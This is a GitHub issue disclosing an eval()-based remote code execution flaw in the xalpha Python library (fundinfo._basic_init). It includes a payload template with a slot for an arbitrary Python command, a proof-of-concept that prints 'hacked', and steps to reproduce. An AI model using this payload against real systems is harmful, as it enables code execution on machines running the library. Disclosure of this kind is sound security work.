CVE-2023-37659: [Warning] RCE in xalpha v0.11.4 ~ v0.11.8 · Issue #175 · refraction-ray/xalpha

Vulnerability Product: xalpha v0.11.4 ~ v0.11.8
Vulnerability version: v0.11.4 ~ v0.11.8
Vulnerability type: Remote Command Execute
Vulnerability Details:
Vulnerability location: xalpha/info.py -> fundinfo._basic_init

without verifying the code user input and using dangerous function eval();, causes rce in xalpha v0.11.4 ~ v0.11.8 at xalpha/info.py -> fundinfo._basic_init

payload = …/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = {your rce python command}; &_=1688890155531#

test_payload = …/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print(‘hacked’); &_=1688890155531#

let’s take the latest version released in the Github v0.11.4 as an example
firstly pip3 install xalpha==0.11.4

pip3 install xalpha==0.11.4

secondly import xalpha

thirdly call xalpha.fundinfo(“…/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print(‘hacked’); &_=1688890155531#”)
here take the test_payload as argument of the function

xalpha.fundinfo(“…/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print(‘hacked’); &_=1688890155531#”)

folloing you could see, it successfully run the py code

proved rce
Also you can prove rce in version 0.11.8, but v0.11.4 is a stable version

reason:
the self.url could be relocate path to / by …

if you input the test_payload …/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print(‘hacked’); &_=1688890155531#, the path will be relocated to /gaoduan/PinzhongRightApi.aspx and callback, the re.match only check the body of response

never check the position of data

so causes rce

discovered by leeya_bug